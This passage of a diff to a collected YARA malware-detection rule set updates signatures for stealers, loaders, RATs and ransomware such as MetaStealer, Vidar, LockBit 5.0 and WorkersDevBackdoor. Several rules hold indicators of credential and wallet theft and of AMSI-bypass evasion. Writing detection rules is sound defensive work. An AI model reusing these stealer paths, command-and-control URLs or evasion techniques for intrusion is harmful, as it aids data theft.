-		logic_hash = "642d5a16c7fb217a297bba683221de474eb028ac48ec8f52be897eaa056acb9b"
+		hash = "55663778a8c593b77a82ea1be072c73dd6a1d7a9567bbfbfad7d3dec9f672996"
+		logic_hash = "64bf0753e2696633ed255df9350a01cb1e75fd6e6c0d4fe48194927acf7e2363"
 		score = 75
-		quality = 79
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {63 7C 77 7B F2 6B 6F C5}
-		$s2 = {52 09 6A D5 30 36 A5 38}
-		$s3 = {6F 72 69 67 69 6E 61 6C 5F 69 6E 73 74 61 6C 6C}
-		$s4 = {43 3A 5C 55 73 65 72 73 5C 50 75 62 6C 69 63 5C 44 6F 77 6E 6C 6F 61 64}
-		$s5 = {25 00 43 00 55 00 52 00 52 00 45 00 4E 00 54 00 5F 00 44 00 45 00 52 00 45 00 43 00 54 00 4F 00 52 00 59 00 25}
-		$s6 = {4E 69 74 72 6F 67 65 6E 54 61 72 67 65 74}
+		$op1 = {E8 ?? ?? ?? ?? E9 00 00 00 00 48 8D}
+		$op2 = {48 3B 85 68 FF FF FF 0F 83 03 01 00 00 C6 85 5F FF FF FF 00 C7 85 58 FF FF FF 00 00 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of them
+		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca or uint32( 0 ) == 0xcafebabf or uint32( 0 ) == 0xbfbafeca ) and ( #op1 > 5000 and $op2 )
 }
-rule RUSSIANPANDA_Win_Mal_Matanbuchus_Loader : FILE
+
+rule RUSSIANPANDA_Metastealer_Core_Payload
 {
 	meta:
-		description = "Detects Matanbuchus 3.0 Loader component"
+		description = "Detects MetaStealer Core Payload"
 		author = "RussianPanda"
-		id = "3a7a22b3-a1aa-59d8-b947-99a2ea192a6b"
-		date = "2025-02-15"
-		modified = "2026-02-16"
+		id = "ff5854b5-4dac-59d7-8c5a-d5b808d63483"
+		date = "2023-12-29"
+		modified = "2023-12-29"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Matanbuchus/win_mal_Matanbuchus_loader.yar#L1-L15"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/MetaStealer/metastealer_core_payload_12-2023.yar#L2-L19"
 		license_url = "N/A"
-		hash = "ec29bcda7d42d812aebd2ee5be6e43256bcf6095b9fc36f92eec5d6475dd5e1f"
-		logic_hash = "a9497b30283d932c134a4bf8f965ce1bd3d590f8dec53cb65fa418a152f67581"
+		logic_hash = "99a319023f2c1b714a70458bd33649d6cc343b500a409af12c2eb1ce38ba4241"
 		score = 75
-		quality = 81
-		tags = "FILE"
+		quality = 85
+		tags = ""
 
 	strings:
-		$s1 = {FF E0 F5 05 EB 0F}
-		$s2 = {65 78 70 61}
-		$s3 = {6E 64 20 33}
-		$s4 = {66 89 ?? ?? ?? ?? 00 00 00 66 89 ?? ?? ?? ?? 00 00 00 66 89}
-		$s5 = {E8 00 00 00 00 83 04 24 05 CB}
+		$s1 = "FileScannerRule"
+		$s2 = "TreeObject"
+		$s3 = "Schema"
+		$s4 = "StringDecrypt"
+		$s5 = "AccountDetails"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 4 of them and filesize < 250KB
+		4 of ( $s* ) and pe.imports ( "mscoree.dll" )
 }
-rule RUSSIANPANDA_Kaiji_Ares : FILE
+rule RUSSIANPANDA_Metastealer_NET_Reactor_Packer : FILE
 {
 	meta:
-		description = "Detects a Variant of Kaiji (Ares) observed during React2Shell exploitation"
+		description = "Detects NET_Reactor_packer 12-2023 used in MetaStealer"
 		author = "RussianPanda"
-		id = "02bcbd60-fc14-5764-a456-061a9a6aea32"
-		date = "2025-12-08"
-		modified = "2025-12-09"
+		id = "5d4f62d2-6a27-53af-9b03-61daa99c10a4"
+		date = "2023-12-29"
+		modified = "2023-12-30"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Kaiji/mal_linux_kaiji_ares.yar#L1-L13"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/MetaStealer/metastealer_12-2023_packer.yar#L1-L16"
 		license_url = "N/A"
-		hash = "c79fcb6c433d8a613f25b9b4c81c1c2514ac97e9aaae7c7c84a432b2476b5e4e"
-		logic_hash = "73d1e00deb6e0d3f78ebc8a19b237df5e869237717b62557abbc652efe000155"
+		logic_hash = "1951d8b05f11b8a77a5bf792ad2b0ad95b8dede936ab5cd0699383468c3c97a8"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 
 	strings:
-		$s1 = "C:/src/client/linux/ares_tcp.go"
-		$s2 = {E5 BC BA E5 88 B6 55 64 70}
-		$s3 = {B0 81 E5 8C 85}
+		$s1 = {C7 84 24 80 02 00 00 24 02 00 00 C6 44 24}
+		$s2 = "mscoree.dll" wide
+		$s3 = {43 61 76 69 6c 73 20 43 6f 72 70 2e 20 32 30 31 30}
+		$s4 = {80 F1 E7 80 F2 44 [16] 80 F1 4B 80 F2 23}
 
 	condition:
-		uint32( 0 ) == 0x464c457f and 2 of them
+		3 of ( $s* ) and filesize < 600KB
 }
 
-rule RUSSIANPANDA_Swaetrat
+rule RUSSIANPANDA_Metastealer
 {
 	meta:
-		description = "Detects SwaetRAT"
+		description = "Detects the old version of MetaStealer 11-2023"
 		author = "RussianPanda"
-		id = "e5238ae4-7ae3-505c-a3fd-ecf6be608fac"
-		date = "2023-11-27"
-		modified = "2023-11-27"
+		id = "c178630b-d188-5faf-86b3-436894241d77"
+		date = "2023-11-16"
+		modified = "2023-12-30"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/SwaetRAT/swaetrat.yar#L3-L19"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/MetaStealer/metastealer.yar#L2-L19"
 		license_url = "N/A"
-		logic_hash = "4dc1107a34d678c3fa0939fab7986fe744ac246400823d08b1ab6db0942821da"
+		logic_hash = "f78b376713daf82aa2e0cbd6bf45f33d25530449fa05673c8a7c6b4c0dddca79"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s2 = "Pong"
-		$s3 = "ReadData"
-		$s4 = "DeskDrop" wide
-		$s5 = "OfflineGet" wide
+		$s1 = "FileScannerRule"
+		$s2 = "MSObject"
+		$s3 = "MSValue"
+		$s4 = "GetBrowsers"
+		$s5 = "Biohazard"
 
 	condition:
-		all of ( $s* ) and pe.imports ( "mscoree.dll" )
+		4 of ( $s* ) and pe.imports ( "mscoree.dll" )
 }
 rule RUSSIANPANDA_Mintsloader
 {
@@ -169242,31 +169276,6 @@ rule RUSSIANPANDA_Mintsloader
 	condition:
 		3 of them
 }
-rule RUSSIANPANDA_Modelorat
-{
-	meta:
-		description = "Detects ModeloRAT Python RAT used by KongTuke"
-		author = "RussianPanda"
-		id = "a9d9644f-c571-527f-b2d2-964c177161a2"
-		date = "2026-01-16"
-		modified = "2026-01-16"
-		reference = "KongTuke CrashFix Campaign"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/KongTuke/ModeloRAT.yar#L1-L14"
-		license_url = "N/A"
-		hash = "c15f44d6abb3a2a882ffdc9b90f7bb5d1a233c0aa183eb765aa8bfba5832c8c6"
-		logic_hash = "9c3f87463ad09f3d1ac36823b096d7b066ce51393086509c3dfd1bbd73210ebb"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$s1 = "UnnecessarilyProlongedCryptographicMechanismImplementationClass"
-		$s2 = "_enumerate_executing_processes"
-		$s3 = "_enumerate_network_connections"
-
-	condition:
-		all of them
-}
 rule RUSSIANPANDA_Gatekeeperpayload : FILE
 {
 	meta:
@@ -169294,357 +169303,295 @@ rule RUSSIANPANDA_Gatekeeperpayload : FILE
 	condition:
 		all of ( $s* ) and filesize < 5MB
 }
-rule RUSSIANPANDA_Darkvnc : FILE
-{
-	meta:
-		description = "Detects DarkVNC"
-		author = "RussianPanda"
-		id = "dbc86ac8-5ea3-59a7-b3ab-68c603165720"
-		date = "2024-01-15"
-		modified = "2024-01-15"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/DarkVNC/darkvnc.yar#L1-L15"
-		license_url = "N/A"
-		hash = "3c74dccd06605bcf527ffc27b3122959"
-		logic_hash = "1dd1246e0b22181706433f0cff9b231017e747d8faaa2db4cb9adefeab492ab7"
-		score = 75
-		quality = 85
-		tags = "FILE"
-
-	strings:
-		$s1 = {66 89 84 24 ?? 00 00 00 B8 ?? 00 00 00}
-		$s2 = {66 31 14 41 48}
-		$s3 = "VncStopServer"
-		$s4 = "VncStartServer"
-
-	condition:
-		uint16( 0 ) == 0x5A4D and 3 of them and filesize < 700KB
-}
-rule RUSSIANPANDA_Vidar_DLL_Embedded
+rule RUSSIANPANDA_Modelorat
 {
 	meta:
-		description = "Vidar Stealer with embedded DLL dependencies"
+		description = "Detects ModeloRAT Python RAT used by KongTuke"
 		author = "RussianPanda"
-		id = "462fe42a-2504-5e7e-ad90-2c7e54478204"
-		date = "2023-05-02"
-		modified = "2023-05-05"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/VidarStealer/vidar_ver3.6_3.7_dll_embedded.yar#L1-L21"
+		id = "a9d9644f-c571-527f-b2d2-964c177161a2"
+		date = "2026-01-16"
+		modified = "2026-01-16"
+		reference = "KongTuke CrashFix Campaign"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/KongTuke/ModeloRAT.yar#L1-L14"
 		license_url = "N/A"
-		logic_hash = "98d23523c2ab196f670dc33164954fc69a1c1692fa870a476e25d7dd3cebace2"
+		hash = "c15f44d6abb3a2a882ffdc9b90f7bb5d1a233c0aa183eb765aa8bfba5832c8c6"
+		logic_hash = "9c3f87463ad09f3d1ac36823b096d7b066ce51393086509c3dfd1bbd73210ebb"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s = {50 4B 03 04 14 00 00 00 08 00 24 56 25 55 2B 6D 5C 08 39 7C 05}
-		$a1 = "https://t.me/mastersbots"
-		$a2 = "https://steamcommunity.com/profiles/76561199501059503"
-		$a3 = "%s\\%s\\Local Storage\\leveldb"
-		$a4 = "\\Autofill\\%s_%s.txt"
-		$a5 = "\\Downloads\\%s_%s.txt"
-		$a6 = "\\CC\\%s_%s.txt"
-		$a7 = "Exodus\\exodus.wallet"
+		$s1 = "UnnecessarilyProlongedCryptographicMechanismImplementationClass"
+		$s2 = "_enumerate_executing_processes"
+		$s3 = "_enumerate_network_connections"
 
 	condition:
-		$s and 5 of ( $a* )
+		all of them
 }
-rule RUSSIANPANDA_Win_Mal_Rustydropper : FILE
+rule RUSSIANPANDA_Workersdevbackdoor_PS : FILE
 {
 	meta:
-		description = "Detects RustyDropper"
+		description = "Detects WorkersDevBackdoor PowerShell script"
 		author = "RussianPanda"
-		id = "9f217080-81e0-547a-9336-cf8ac2fadf36"
-		date = "2024-03-01"
-		modified = "2024-03-01"
+		id = "d2b526c1-a9f5-57de-818c-99b02e778a0d"
+		date = "2023-12-15"
+		modified = "2023-12-15"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/RustyDropper/win_mal_RustyDropper.yar#L1-L12"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/WorkersDevBackdoor/WorkersDevBackdoor_PS.yar#L1-L18"
 		license_url = "N/A"
-		hash = "a3a5e7011335a2284e2d4f73fd464ff129f0c9276878a054c1932bc50608584b"
-		logic_hash = "d0c76bcd1af63cc1b1fbabc3fa33e6caafd7d9c7c3780a94a1ed37eadef655d7"
+		logic_hash = "c71eed8fd7a44f3018150cc6ef55d10779093ed8e4c77fd9babcf9b1b9fadfda"
 		score = 75
-		quality = 81
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {47 3a 5c 52 55 53 54 5f 44 52 4f 50 50 45 52 5f 45 58 45 5f 50 41 59 4c 4f 41 44 5c 44 52 4f 50 50 45 52 5f 4d 41 49 4e 5c}
-		$s2 = {46 45 41 54 55 52 45 5f 42 52 4f 57 53 45 52 5f 45 4d 55 4c 41 54 49 4f 4e}
+		$s1 = "sleep" wide
+		$s2 = "convertto-securestring" wide
+		$s3 = "System.Drawing.dll" wide
+		$s4 = "System.Web.Extensions.dll" wide
+		$s5 = "System.Windows.Forms.dll" wide
+		$s6 = "CSharp" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of ( $s* ) and filesize < 200KB
 }
-rule RUSSIANPANDA_Legionloader : FILE
+
+rule RUSSIANPANDA_Workersdevbackdoor : FILE
 {
 	meta:
-		description = "Detects LegionLoader core payload"
+		description = "Detects WorkersDevBackdoor"
 		author = "RussianPanda"
-		id = "8ef86f65-543e-5491-8459-fd540e70fc0c"
-		date = "2024-10-05"
-		modified = "2024-12-30"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satacom"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/LegionLoader/legionloader.yar#L1-L17"
+		id = "725e0924-c108-5927-8d27-e4bc5b284883"
+		date = "2023-12-15"
+		modified = "2024-01-05"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/WorkersDevBackdoor/WorkDevBackdoor.yar#L3-L20"
 		license_url = "N/A"
-		hash = "3b630367b2942bd765f8a35bca47ea6b"
-		logic_hash = "c833b22a6e87f6289e723a51ac9eb02848a4868c73ca9f568f6450e53c41a657"
+		logic_hash = "f92ad9dc657d87a47e539ea2ee896f9b86bb95e51a890a838c6e6b0efa5deb7d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "crypto_domain"
-		$s2 = "postback_url"
-		$s3 = "last_win_error"
+		$s1 = {72 00 65 00 67 00 69 00 73 00 74 00 65 00 72 00 20 00 7B 00 30 00 7D 00 20 00 7B 00 31 00 7D}
+		$s2 = {72 FB 00 00 70 72 13 01 00 70 28 20 00 00 0A 72 2D 01 00 70}
+		$s3 = {55 00 53 00 45 00 52 00 44 00 4F 00 4D 00 41 00 49 00 4E}
+		$s4 = {43 00 4F 00 4D 00 50 00 55 00 54 00 45 00 52 00 4E 00 41 00 4D 00 45}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and filesize < 500KB
+		3 of ( $s* ) and pe.imports ( "mscoree.dll" ) and filesize < 2MB
 }
-rule RUSSIANPANDA_Legionloader_Dropper : FILE
+rule RUSSIANPANDA_Weyhroc2 : FILE
 {
 	meta:
-		description = "Detects malicious LegionLoader DLL dropper"
+		description = "Detects Weyhro C2"
 		author = "RussianPanda"
-		id = "a1b04033-cfe0-5088-bfee-d08752e8840b"
-		date = "2024-09-23"
-		modified = "2024-09-23"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satacom"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/LegionLoader/LegionLoader_dropper.yar#L1-L17"
+		id = "228bc7be-ebe0-5dcd-aaf3-be0bf5aa6e1b"
+		date = "2025-12-04"
+		modified = "2025-12-05"
+		reference = "https://x.com/RussianPanda9xx/status/1996258417476837746?s=20"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/WeyhroC2/win_mal_weyhroc2.yar#L1-L15"
 		license_url = "N/A"
-		hash = "ef5b961ebc6167e728f9bf40e726ac71"
-		logic_hash = "0871a6a0ab2c405793e8a49e662ba41acdcc6c8afac315f290de2cc05abd39fa"
+		hash = "ec4ab4e4d700c9e5fdda59eb879a2bf18d0eefd825539d64677144d43a744cee"
+		logic_hash = "fe15c701afd3f7bc6ecd0f1d228f158f4cec5d0ad8932f0014e4d78ca7427f43"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {48 03 CA [0-50] 33 D2 33 C9 FF 15 ?? ?? ?? ?? 33 D2 33 C9 FF 15}
-		$s2 = {44 30 3B 48 FF C3}
-		$s3 = {8B ?? 8B ?? 83 ?? 01 D1 ?? F7 ?? 81 ?? 20 83 B8 ED 8B}
+		$s1 = "AMSI patch skipped"
+		$s2 = "AMSI patched successfully"
+		$s3 = "IAT unhook successful"
+		$s4 = "Inline unhook successful"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and filesize < 1MB
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Win_Ransom_Lockbit5 : FILE
+rule RUSSIANPANDA_Vidar_DLL_Embedded
 {
 	meta:
-		description = "Detects LockBit 5.0"
+		description = "Vidar Stealer with embedded DLL dependencies"
 		author = "RussianPanda"
-		id = "bfe66503-fdd1-5a9a-9509-5b97efaabd9b"
-		date = "2025-09-15"
-		modified = "2025-09-15"
+		id = "462fe42a-2504-5e7e-ad90-2c7e54478204"
+		date = "2023-05-02"
+		modified = "2023-05-05"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Ransomware/win_ransom_lockbit5.0.yar#L1-L15"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/VidarStealer/vidar_ver3.6_3.7_dll_embedded.yar#L1-L21"
 		license_url = "N/A"
-		hash = "7ea5afbc166c4e23498aa9747be81ceaf8dad90b8daa07a6e4644dc7c2277b82"
-		logic_hash = "579944626f576ce9771b0a7de40a5766221acd5db1ef4257a45314a99714067d"
+		logic_hash = "98d23523c2ab196f670dc33164954fc69a1c1692fa870a476e25d7dd3cebace2"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = {C6 41 0F 00 0F B6 ?? 33 ?? 89}
-		$s2 = {0F B6 ?? 0F C1 ?? 18 31}
-		$s3 = {83 ?? 02 83 ?? 0F D0 84 ?? ?? 00 00 00}
+		$s = {50 4B 03 04 14 00 00 00 08 00 24 56 25 55 2B 6D 5C 08 39 7C 05}
+		$a1 = "https://t.me/mastersbots"
+		$a2 = "https://steamcommunity.com/profiles/76561199501059503"
+		$a3 = "%s\\%s\\Local Storage\\leveldb"
+		$a4 = "\\Autofill\\%s_%s.txt"
+		$a5 = "\\Downloads\\%s_%s.txt"
+		$a6 = "\\CC\\%s_%s.txt"
+		$a7 = "Exodus\\exodus.wallet"
 
 	condition:
-		all of ( $s* ) and uint16( 0 ) == 0x5A4D and filesize < 1MB
+		$s and 5 of ( $a* )
 }
-rule RUSSIANPANDA_Mal_Botnetfenix_Payload : FILE
+rule RUSSIANPANDA_Win_Mal_Glorysprout_Stealer : FILE
 {
 	meta:
-		description = "Detects BotnetFenix payload"
+		description = "Detects GlorySprout Stealer"
 		author = "RussianPanda"
-		id = "566bfae1-c43d-5bd6-adcf-faff32d8c325"
-		date = "2024-02-02"
-		modified = "2024-02-04"
+		id = "44c50f20-479e-5960-9ab9-97b9a17d7cbf"
+		date = "2024-03-16"
+		modified = "2024-03-16"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/FenixBotnet/mal_BotnetFenix_Payload.yar#L1-L16"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/GlorySprout/win_mal_GlorySprout_Stealer.yar#L1-L13"
 		license_url = "N/A"
-		hash = "65a9575c50a96d04a3f649fe0f6b8ccd"
-		logic_hash = "27f423b509ad8de0f8389c7b3e3bfec2eeb10c964aa8c70bad47cc4334df1a5e"
+		hash = "8996c252fc41b7ec0ec73ce814e84136be6efef898822146c25af2330f4fd04a"
+		logic_hash = "c843f7924e69c1b9fc3676178aa630319fe25605deddcd73c4905c51cc97d7eb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "tasks_register"
-		$s2 = "actionget_action"
-		$s3 = "Post Success"
-		$s4 = "Success Stealer"
-		$s5 = "Download and Execute task id"
-		$a = "_CorExeMain"
+		$s1 = {25 0F 00 00 80 79 05 48 83 C8 F0 40}
+		$s2 = {8B 82 A4 00 00 00 8B F9 89 06 8D 4E 0C 8B 82 A8 00 00 00 89 46 04 0F B7 92 AC 00 00 00 89 56 08}
+		$s3 = {0F B6 06 C1 E7 04 03 F8 8B C7 25 00 00 00 F0 74 0B C1 E8 18}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 4 of ( $s* ) and $a
+		uint16( 0 ) == 0x5A4D and all of them and #s1 > 100
 }
-rule RUSSIANPANDA_Mal_Fenixbotnet_Jse
+rule RUSSIANPANDA_Obfuscation_Powershell_Special_Chars
 {
 	meta:
-		description = "Detects Fenix Botnet JSE downloader"
+		description = "Detects PowerShell special character obfuscation"
 		author = "RussianPanda"
-		id = "00c6f8a6-c2e2-5b08-b332-b91371060bbe"
-		date = "2024-01-18"
+		id = "dd2d41d4-3431-5252-adf1-d537f3b8db7e"
+		date = "2024-01-12"
 		modified = "2024-02-02"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/FenixBotnet/mal_FenixBotnet_jse.yar#L1-L14"
+		reference = "https://perl-users.jp/articles/advent-calendar/2010/sym/11"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/PowerShell Obfuscation/obfuscation_powershell_special_chars.yar#L1-L15"
 		license_url = "N/A"
-		hash = "a7fadf0050d4d0b2cefd808e16dfde69"
-		logic_hash = "848c00361fba60e63e8ec4098404e87d4ba2b11d8489ad16d49c20fc653a5e45"
+		hash = "d77efad78ef3afc5426432597ba129141952719846bc5ccd058249bb23d8a905"
+		logic_hash = "4cc4ebffe7bf712b412a060536acc51d94381d24b46e5494195ae17482076cd6"
 		score = 75
-		quality = 85
+		quality = 81
 		tags = ""
 
 	strings:
-		$s1 = {76 61 72 20 [0-30] 3D 20 22 66 22}
-		$s2 = {76 61 72 20 [0-30] 3D 20 22 75 22}
-		$s3 = {76 61 72 20 [0-30] 3D 20 22 6E 22}
-		$s4 = {6E 65 77 20 46 75 6E 63 74 69 6F 6E 28 64 65 63 6F 64 65 55 52 49 43 6F 6D 70 6F 6E 65 6E 74 28 [0-30] 29 29 2E 63 61 6C 6C 28 29}
+		$s1 = {7d 3d 2b 2b 24 7b}
+		$s2 = {24 28 20 20 29}
+		$s3 = {24 7B [1-10] 7D 20 20 2B 20 20 24}
+		$s4 = {24 7B [1-10] 7D 24 7B}
 
 	condition:
-		all of ( $s* )
+		2 of ( $s* )
 }
-
-rule RUSSIANPANDA_Metastealer
+rule RUSSIANPANDA_Sentinel_Stealer
 {
 	meta:
-		description = "Detects the old version of MetaStealer 11-2023"
+		description = "Detects Sentinel Stealer"
 		author = "RussianPanda"
-		id = "c178630b-d188-5faf-86b3-436894241d77"
-		date = "2023-11-16"
-		modified = "2023-12-30"
+		id = "8a221d7b-8fa6-53cd-a3e8-63cc67285186"
+		date = "2024-01-19"
+		modified = "2024-01-19"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/MetaStealer/metastealer.yar#L2-L19"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/SentinelStealer/sentinel_stealer.yar#L1-L14"
 		license_url = "N/A"
-		logic_hash = "f78b376713daf82aa2e0cbd6bf45f33d25530449fa05673c8a7c6b4c0dddca79"
+		hash = "3a540a8a81c5a5b452f154d7875423a3"
+		logic_hash = "b9d72848842ea4d26544633bb83fccd17239b28493bde3f73341eb2004d8ee0c"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s1 = "FileScannerRule"
-		$s2 = "MSObject"
-		$s3 = "MSValue"
-		$s4 = "GetBrowsers"
-		$s5 = "Biohazard"
+		$s1 = "Sentinel.SmallerEncryptedIcon" wide
+		$s2 = "SentinelSteals" wide
+		$s4 = "_CorExeMain"
 
 	condition:
-		4 of ( $s* ) and pe.imports ( "mscoree.dll" )
+		all of them
 }
-
-rule RUSSIANPANDA_Metastealer_Core_Payload
+rule RUSSIANPANDA_Win_Mal_Astarionrat : FILE
 {
 	meta:
-		description = "Detects MetaStealer Core Payload"
+		description = "Detects AstarionRAT"
 		author = "RussianPanda"
-		id = "ff5854b5-4dac-59d7-8c5a-d5b808d63483"
-		date = "2023-12-29"
-		modified = "2023-12-29"
+		id = "70588745-761a-5b74-a612-7affde300b09"
+		date = "2025-02-14"
+		modified = "2026-02-14"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/MetaStealer/metastealer_core_payload_12-2023.yar#L2-L19"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/AstarionRAT/win_mal_AstarionRAT.yar#L1-L13"
 		license_url = "N/A"
-		logic_hash = "99a319023f2c1b714a70458bd33649d6cc343b500a409af12c2eb1ce38ba4241"
+		hash = "a508d0bb583dc6e5f97b6094f8f910b5b6f2b9d5528c04e4dee62c343fce6f4b"
+		logic_hash = "ea8050f9127fdbc70b3e8f390bb557b9ac39045e98a1998f11363016d17c3164"
 		score = 75
 		quality = 85
-		tags = ""
-
-	strings:
-		$s1 = "FileScannerRule"
-		$s2 = "TreeObject"
-		$s3 = "Schema"
-		$s4 = "StringDecrypt"
-		$s5 = "AccountDetails"
-
-	condition:
-		4 of ( $s* ) and pe.imports ( "mscoree.dll" )
-}
-rule RUSSIANPANDA_Metastealer_NET_Reactor_Packer : FILE
-{
-	meta:
-		description = "Detects NET_Reactor_packer 12-2023 used in MetaStealer"
-		author = "RussianPanda"
-		id = "5d4f62d2-6a27-53af-9b03-61daa99c10a4"
-		date = "2023-12-29"
-		modified = "2023-12-30"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/MetaStealer/metastealer_12-2023_packer.yar#L1-L16"
-		license_url = "N/A"
-		logic_hash = "1951d8b05f11b8a77a5bf792ad2b0ad95b8dede936ab5cd0699383468c3c97a8"
-		score = 75
-		quality = 83
 		tags = "FILE"
 
 	strings:
-		$s1 = {C7 84 24 80 02 00 00 24 02 00 00 C6 44 24}
-		$s2 = "mscoree.dll" wide
-		$s3 = {43 61 76 69 6c 73 20 43 6f 72 70 2e 20 32 30 31 30}
-		$s4 = {80 F1 E7 80 F2 44 [16] 80 F1 4B 80 F2 23}
+		$s1 = "s5://%s:%s@%s:%d"
+		$s2 = "Failed to connect to the server"
+		$s3 = "Impersonated"
 
 	condition:
-		3 of ( $s* ) and filesize < 600KB
+		uint16( 0 ) == 0x5A4D and all of them
 }
 
-rule RUSSIANPANDA_Purecrypter_Core : FILE
+rule RUSSIANPANDA_Andeloader
 {
 	meta:
-		description = "Detects PureCrypter Core payload"
+		description = "Detects Ande Loader"
 		author = "RussianPanda"
-		id = "41aaa187-0fb5-53fe-a162-8d1a4974ccc1"
-		date = "2024-01-09"
-		modified = "2024-01-09"
-		reference = "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/PureCrypter/purecrypter_core.yar#L3-L28"
+		id = "c08d63b6-9fef-505d-9611-9dd0403c7c7c"
+		date = "2023-12-11"
+		modified = "2023-12-11"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/AndeLoader/ande_loader.yar#L3-L18"
 		license_url = "N/A"
-		hash = "e4faa7d7a098414449abffb210fd874798207ee9d27643c8088676ff429b56b7"
-		logic_hash = "8c761a98369436ffbe1379152461753778985a42ae656567018b47c71af7d866"
+		logic_hash = "cd55153077e5cfbd84cbe5b062dbd842def245417acfea4ed6c2b1db702dcc81"
 		score = 75
-		quality = 81
-		tags = "FILE"
+		quality = 83
+		tags = ""
 
 	strings:
-		$s1 = {47 5A 69 70 53 74 72 65 61 6D}
-		$s2 = {41 73 73 65 6D 62 6C 79 4C 6F 61 64 65 72 00 43 6F 73 74 75 72 61}
